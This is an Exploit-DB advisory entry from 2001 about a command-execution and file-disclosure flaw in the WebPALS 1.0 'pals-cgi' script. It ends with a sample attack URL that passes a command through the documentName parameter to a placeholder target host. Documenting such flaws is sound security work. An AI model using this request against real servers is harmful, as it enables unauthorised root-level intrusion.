PALS Library System WebPALS 1.0 - 'pals-cgi' Arbitrary Command Execution

EDB-ID:

20632


Author:

cuctema

Type:

remote


Platform:

CGI

Date:

2001-02-02


source: https://www.securityfocus.com/bid/2372/info
 
A specially crafted URL composed of a known filename, will disclose the requested file residing on a machine running WebPALS. This vulnerability will also allow an attacker to execute arbitrary code with root privileges. 

http://target/pals-cgi?palsAction=restart&documentName=url_to_command